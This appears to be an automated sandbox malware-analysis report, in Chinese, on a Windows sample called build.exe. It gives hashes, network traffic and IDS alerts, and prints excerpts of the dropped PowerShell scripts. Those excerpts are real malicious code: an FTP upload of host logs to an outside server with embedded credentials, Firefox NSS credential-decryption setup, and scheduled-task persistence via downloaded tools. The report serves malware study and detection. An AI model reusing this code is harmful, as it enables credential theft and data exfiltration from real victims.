分析类型 | 虚拟机标签 | 开始时间 | 结束时间 | 持续时间 |
---|---|---|---|---|
文件 (Windows) | win7-sp1-x64-hpdapp03-1 | 2018-09-19 17:52:20 | 2018-09-19 17:54:48 | 148 秒 |
文件名 | build.exe |
---|---|
文件大小 | 240640 字节 |
文件类型 | PE32+ executable (console) x86-64, for MS Windows |
MD5 | 1680f107e9578f61355c15329f69eb4b |
SHA1 | a835433174cc6f081ff13b3e3582aeb303df6534 |
SHA256 | 4d749c53b4f28a2e2896f5e2d25db811c3d036605dd657d165b6baa49ae9e705 |
SHA512 | f769aa09c782a8985b0ece4e8e67b2b8afc4ba36a73ee91897efb49360455a96458d7a2dc4dc8ed6c9dad79edd2369395c8271c745aa68e455c8c5c38158a3df |
CRC32 | A29F9295 |
Ssdeep | 6144:GE9o6C0wMeewgctohHgw9BxUSE9LltYoW5E:G36C0mtoHrxIvW |
Yara | 登录查看Yara规则 |
样本下载 提交误报 |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 23.23.114.123 | 美国 | |
是 | 91.112.214.182 | 奥地利 |
域名 | 安全评级 | 响应 |
---|---|---|
api.ipify.org |
A 54.243.179.137 CNAME nagano-19599.herokussl.com A 50.16.248.221 A 50.19.229.252 A 23.21.121.219 A 23.23.114.123 A 54.243.123.39 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com |
初始地址 | 0x140000000 |
---|---|
入口地址 | 0x140003158 |
声明校验值 | 0x00000000 |
实际校验值 | 0x000407e0 |
最低操作系统版本要求 | 6.0 |
编译时间 | 2018-09-18 19:30:02 |
载入哈希 | 012e200829394c80788807acf5c9390a |
名称 | 虚拟地址 | 虚拟大小 | 原始数据大小 | 特征 | 熵(Entropy) |
---|---|---|---|---|---|
.text | 0x00001000 | 0x00011778 | 0x00011800 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 6.47 |
.rdata | 0x00013000 | 0x0000fb02 | 0x0000fc00 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 5.05 |
.data | 0x00023000 | 0x000186ec | 0x00017000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 7.42 |
.pdata | 0x0003c000 | 0x00001194 | 0x00001200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.98 |
.gfids | 0x0003e000 | 0x00000104 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 1.88 |
.tls | 0x0003f000 | 0x00000009 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE | 0.02 |
.rsrc | 0x00040000 | 0x000001e0 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 4.70 |
.reloc | 0x00041000 | 0x00000af8 | 0x00000c00 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ | 5.28 |
名称 | 偏移量 | 大小 | 语言 | 子语言 | 熵(Entropy) | 文件类型 |
---|---|---|---|---|---|---|
RT_MANIFEST | 0x00040060 | 0x0000017d | LANG_ENGLISH | SUBLANG_ENGLISH_US | 4.91 | XML 1.0 document text |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 23.23.114.123 | 美国 | |
是 | 91.112.214.182 | 奥地利 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49165 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49166 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49167 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49168 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49169 | 23.23.114.123 api.ipify.org | 80 |
91.112.214.182 | 21 | 192.168.122.201 | 49178 |
192.168.122.201 | 49179 | 91.112.214.182 | 37120 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 61941 | 192.168.122.1 | 53 |
域名 | 安全评级 | 响应 |
---|---|---|
api.ipify.org |
A 54.243.179.137 CNAME nagano-19599.herokussl.com A 50.16.248.221 A 50.19.229.252 A 23.21.121.219 A 23.23.114.123 A 54.243.123.39 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49165 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49166 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49167 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49168 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49169 | 23.23.114.123 api.ipify.org | 80 |
91.112.214.182 | 21 | 192.168.122.201 | 49178 |
192.168.122.201 | 49179 | 91.112.214.182 | 37120 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 61941 | 192.168.122.1 | 53 |
URI | HTTP数据 |
---|---|
URL专业沙箱检测 -> http://api.ipify.org/ | GET / HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: api.ipify.org Connection: Keep-Alive |
无SMTP流量.
无IRC请求.
无ICMP流量.
无 CIF 结果
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2018-09-19 17:52:57.365203+0800 | 91.112.214.182 | 21 | 192.168.122.201 | 49178 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2018-09-19 17:52:47.946077+0800 | 192.168.122.201 | 49169 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:47.273909+0800 | 192.168.122.201 | 49168 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:46.312625+0800 | 192.168.122.201 | 49166 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:45.860509+0800 | 192.168.122.201 | 49165 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:46.794717+0800 | 192.168.122.201 | 49167 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
No TLS
No Suricata HTTP
文件名 | 590aee7bdd69b59b.customDestinations-ms |
---|---|
相关文件 |
C:\Users\test\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
|
文件大小 | 7960 字节 |
文件类型 | data |
MD5 | 7f011366e63a75160f463b4e50fce6e9 |
SHA1 | 48243f89da9c5c28f6ca37c22a9f6c7e0ec4eff0 |
SHA256 | cf2b29afd8950689c52611272a3ae15cfb1b966a1081e70d53eeeb15f6006ecf |
CRC32 | FCC4A063 |
Ssdeep | 96:GWCP9MefqvsqvJCwooWvWCP9MefqvsEHyqvJCwowyMWwz+GHOGplUV+:GR9yooWvR96HnownWwEGL |
下载 提交魔盾安全分析 |
文件名 | prefs.js |
---|---|
相关文件 |
C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
|
文件大小 | 19320 字节 |
文件类型 | ASCII text, with very long lines, with CRLF, LF line terminators |
MD5 | 86fb36cab2b70a350ebc55764bfdc1ce |
SHA1 | 6bdb6a37333e7e7b1cb6a0e505ec44369c19624a |
SHA256 | ab8e4b32f032bb11eb7a44d92461bf4306f6d23e8ffa3ca460d074dcf46d4842 |
CRC32 | 04794156 |
Ssdeep | 192:VbzmgU5+adaIMC6EMJu6w1tHpQxKRVD5+jzYfY76D1hW3zc7l8z9oaHfivG++:RyX1tJWKH4jkQic3zule9oqfwGx |
Yara |
|
下载 提交魔盾安全分析 显示文本 | |
# Mozilla User Preferences /* Do not edit this file. * * If you make changes to this file while the application is running, * the changes will be overwritten when the application exits. * * To make a manual change to preferences, you can visit the URL about:config * For more information, see http://www.mozilla.org/unix/customizing.html#prefs */ user_pref("app.update.auto", false); user_pref("app.update.enabled", false); user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1504369291); user_pref("app.update.lastUpdateTime.background-update-timer", 1496022491); user_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1535765397); user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1495632979); user_pref("app.update.lastUpdateTime.experiments-update-timer", 1494516459); user_pref("app.update.lastUpdateTime.search-engine-update-timer", 1495633099); user_pref("app.update.lastUpdateTime.xpi-signature-verification", 1494516821); user_pref("app.update.service.enabled", false); user_pref("browser.cache.disk.capacity", 358400); user_pref("browser.cache.disk.filesystem_reported", 1); user_pref("browser.cache.disk.smart_size.first_run", false); user_pref("browser.cache.disk.smart_size.use_old_max", false); user_pref("browser.cache.disk.smart_size_cached_value", 624640); user_pref("browser.cache.frecency_experiment", 2); user_pref("browser.download.importedFromSqlite", true); user_pref("browser.link.open_newwindow", 2); user_pref("browser.migrated-sync-button", true); user_pref("browser.migration.version", 37); user_pref("browser.newtabpage.enhanced", true); user_pref("browser.newtabpage.storageVersion", 1); user_pref("browser.offline-apps.notify", false); user_pref("browser.pagethumbnails.storage_version", 3); user_pref("browser.places.smartBookmarksVersion", 7); user_pref("browser.preferences.advanced.selectedTabIndex", 0); user_pref("browser.rights.3.shown", true); user_pref("browser.safebrowsing.enabled", false); user_pref("brows <truncated> |
文件名 | 4T1URnT.ps1 |
---|---|
相关文件 |
C:\ProgramData\4T1URnT.ps1
|
文件大小 | 7840 字节 |
文件类型 | ASCII text, with very long lines |
MD5 | 73641e857a0402982c7c49497988bd1a |
SHA1 | e3d97e1e93d3abea271f744d6685823822549fd2 |
SHA256 | 7f754d568be48a27c1753b782f868eac82b23dd56255b1188ea189168a080073 |
CRC32 | 5A275F72 |
Ssdeep | 192:YFehO/hpoSDdyUIwizis3TWwcDJKqxPmQ0AtfouLbmlod0WL:YFeh2YC/Iz5vGgllsd |
下载 提交魔盾安全分析 显示文本 | |
$SH_TYPE_SCHEDULED_TASK=1; $SH_TYPE_TASK_SCHEDULER=2; $schedulerType=$SH_TYPE_SCHEDULED_TASK; function mBXmzjwCLJY { param([string]$zipfile, [string]$destination); $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe'; if (-NOT (Test-Path $7z)){ Try { (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z); } Catch{} } if ($(Try { Test-Path $7z.trim() } Catch { $false })){ Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow } else{ $shell = new-object -com shell.application; $zip = $shell.NameSpace($zipfile); foreach($item in $zip.items()) { $shell.Namespace($destination).copyhere($item); } } } function Base64ToFile { param([string]$file, [string]$string); $bytes=[System.Convert]::FromBase64String($string); #set-content -encoding byte $file -value $bytes; [IO.File]::WriteAllBytes($file, $bytes); } function RandomString{ param([int]$min=5, [int]$max=15); return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_})); } function InitScheduller{ try{ Import-Module ScheduledTasks -ErrorAction Stop; return $SH_TYPE_SCHEDULED_TASK; }catch{ $File=$env:Temp+'\'+(RandomString)+'.zip'; $Dest=$env:Temp+'\'+(RandomString); while (!(uaFSXULxO 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {} if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null; mBXmzjwCLJY $File $Dest; Remove-Item -Force $File; $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll'; $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly); return $SH_TYPE_TASK_SCHEDULER; } } function LQFPqwtAc { param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir=''); switch ($schedulerType) { $SH_TYPE_SCHEDULED_TASK { $Action = New-ScheduledTaskAction -Execute $cmd; if(-Not [String]::IsNullOrEmpty($params)){ <truncated> |
文件名 | 4IKYPwsB.ps1 |
---|---|
相关文件 |
C:\Users\test\AppData\Local\Temp\4IKYPwsB.ps1
|
文件大小 | 2954 字节 |
文件类型 | ASCII text |
MD5 | e846f6d85399752c2e51562b2b1fda1b |
SHA1 | d5478afcf056a839a3d572f20535d3789bfbc2ba |
SHA256 | d817e3233e95a5f7f80b4dcc45f121c3b9401ed2ca3ae5fbde168838b4a90ff4 |
CRC32 | FFACF392 |
Ssdeep | 48:8pGE0tr4bGE9ZMpu0oUUqxndOqCRY1hGBQWWW0WfkufCLTi4ukiXKEU:8cEm/GkOqxnoJGhGWZfokuqL+4u9Kp |
下载 提交魔盾安全分析 显示文本 | |
$Logfile = $env:Temp+"\\$(gc env:computername).log"; Function LogWrite { Param ([string]$logstring) $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss"; $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring); Write-Host $msg; Add-content $Logfile -value $msg; } Function UploadLog { $dest = "ftp://Wettbewerb:mantler1220x@91.112.214.182/public_html/log"; $webclient = New-Object -TypeName System.Net.WebClient; $webclient.UploadFile("$dest/$(gc env:computername).log", $Logfile); Remove-Item -Path $Logfile; } function CheckInstall(){ $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages); $wininfo.MUILanguages=$wininfo.MUILanguages -join ","; LogWrite("OS info: {0}" -f $wininfo -join ""); if (test-path variable:psversiontable) { $version = $psversiontable.psversion; } else { $version = [version]"1.0.0.0"; } LogWrite("Powershell version: {0}" -f $version); try { $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop; LogWrite("Pac setted: '$pac'"); } catch { LogWrite("ERROR: Pac not setted"); } $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)}); if (-NOT $Certs.count -eq 0){ LogWrite("Certs installed: '{0}'" -f ($Certs -join "; ")); }else { LogWrite("Certs not found"); } try{ $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out; LogWrite("Proccess list:`n{0}" -f ($proc -join "`n")); } catch { LogWrite("ERROR: Can't get proccess list"); } $DestTP=$env:ALLUSERSPROFILE; try{ $dirs=dir($Dest <truncated> |
文件名 | oSzISqLc.ps1 |
---|---|
相关文件 |
C:\Users\test\AppData\Local\Temp\oSzISqLc.ps1
|
文件大小 | 16697 字节 |
文件类型 | ASCII text, with very long lines |
MD5 | 27dd3d6d9cbe3086f9372969ed3eb509 |
SHA1 | b28705456378c643fcd14e2e93d8e3954c7f4cc9 |
SHA256 | 342b08694340c66ab5624a1408e2e04fe97a93dd187188bd7849e947e39e5c75 |
CRC32 | E828B8FB |
Ssdeep | 384:VlVaeQiGvZ8mUx3ILBwuSXGgNm/G7T2Imh6H/HGDifPWBLyxh9bbIEng7y7zNL:8Lmhnln9L |
下载 提交魔盾安全分析 显示文本 | |
function zmxOnQbNYHfz{ Add-Type @" using System; using System.IO; using Microsoft.Win32; using System.Runtime.InteropServices; using System.ComponentModel; public sealed class AxKPAeUfXdxN { private static volatile AxKPAeUfXdxN UjtfVoGeYlF; private static object XVsvCnlNl = new Object(); public static AxKPAeUfXdxN ElvKLjdGNIXDuNy() { if (UjtfVoGeYlF == null) { lock (XVsvCnlNl) { if (UjtfVoGeYlF == null) UjtfVoGeYlF = new AxKPAeUfXdxN(); } } return UjtfVoGeYlF; } const int uUamOglyct=0; [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); private static IntPtr HPQiihMcaW(string libPath) { if (String.IsNullOrEmpty(libPath)) throw new ArgumentNullException("libPath"); IntPtr moduleHandle = LoadLibrary(libPath); if (moduleHandle == IntPtr.Zero) { int lasterror = Marshal.GetLastWin32Error(); System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror)); Win32Exception innerEx = new Win32Exception(lasterror); innerEx.Data.Add("LastWin32Error", lasterror); throw new Exception("can't load DLL " + libPath, innerEx); } return moduleHandle; } [DllImport("kernel32.dll")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName); //Constants const uint NSS_INIT_READONLY=0x1; const uint NSS_INIT_NOCERTDB = 0x2; const uint NSS_INIT_NOMODDB = 0x4; const uint NSS_INIT_FORCEOPEN = 0x8; const uint NSS_INIT_NOROOTINIT = 0x10; const uint NSS_INIT_OPTIMIZESPACE = 0x20; const uint NSS_INIT_PK11THREADSAFE = 0x40; const uint NSS_INIT_PK11RELOAD = 0x80; const uint NSS_INIT_NOPK11FINALIZE = 0x100; const uint NSS_INIT_RESERVED = 0x200; const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_I <truncated> |
文件名 | TEST-PC.log |
---|---|
相关文件 |
C:\Users\test\AppData\Local\Temp\TEST-PC.log
|
文件大小 | 1862 字节 |
文件类型 | ISO-8859 text, with very long lines, with CRLF, LF line terminators |
MD5 | 1f24bdcc538f2234660156420cf8ee40 |
SHA1 | cf38a3cbc67dcf59306a9a739098ac995da73b9a |
SHA256 | cae594a6ef3c49c953c9d980c8a9f3fe62538052e25e3dd33744b088c4f1c3a5 |
CRC32 | 87B543B5 |
Ssdeep | 48:oFvg2ZjWazBzl/gTX5ghgJgP1gNoZMg9g1JgUgvXsgvRghxMglK0B0s+REI2gi:oZdZSaVzFAX5gY0WoWO6JpocoROMy0pC |
下载 提交魔盾安全分析 |
文件名 | KQSnVak9.ps1 |
---|---|
相关文件 |
C:\Users\test\AppData\Local\Temp\KQSnVak9.ps1
|
文件大小 | 9677 字节 |
文件类型 | ASCII text, with very long lines |
MD5 | 995634a1d0bc0cb3a352e29e574a3c47 |
SHA1 | 723f366a107d20d2cb971b31b2a01aa8d394f663 |
SHA256 | 526298e976e7ed46f04310c99c51aeb499e28a59a682c73644114e303bd016aa |
CRC32 | 604DA640 |
Ssdeep | 192:UYMYUYXzfTfdM4F2InfmCc3y+JFLOKBWZsJdgQzPidaZaakYyzHzYTX1Ag7yWPqm:Ue7T7cHFLOKVJdgQzP9k4X1Ag7y7zNQ |
下载 提交魔盾安全分析 显示文本 | |
function VcyyMgvYmuCnzB{ Add-Type @" using System; using System.Text; using System.Runtime.InteropServices; using System.Diagnostics; using System.Security.Cryptography.X509Certificates; using System.Threading; public static class pcqEf { public class XEcTYoJfPBuKg { public string Wndclass; public string Title; public string Process; public IntPtr hWnd; } private delegate bool PayImryPKI(IntPtr hWnd, ref XEcTYoJfPBuKg data); [DllImport("user32.dll")] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool EnumWindows(PayImryPKI lpEnumFunc, ref XEcTYoJfPBuKg data); [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount); [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); [DllImport("user32.dll")] [return: MarshalAs(UnmanagedType.Bool)] static extern bool SetForegroundWindow(IntPtr hWnd); public delegate bool gcdSJ(IntPtr hwnd, IntPtr lParam); [DllImport("user32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool EnumChildWindows(IntPtr window, gcdSJ callback, IntPtr lParam); [DllImport("user32.dll", CharSet = CharSet.Auto)] static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam); [Flags] private enum SnapshotFlags : uint { HeapList = 0x00000001, Process = 0x00000002, Thread = 0x00000004, Module = 0x00000008, Module32 = 0x00000010, Inherit = 0x80000000, All = 0x0000001F, NoHeaps = 0x40000000 } //inner struct used only internally [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] private struct PROCESSENTRY32 { const <truncated> |
HTML 总结报告 (需15-60分钟同步) |
下载 |
---|
Task ID | 188774 |
---|---|
Mongo ID | 5ba21d1da093ef245f83b93a |
Cuckoo release | 1.4-Maldun |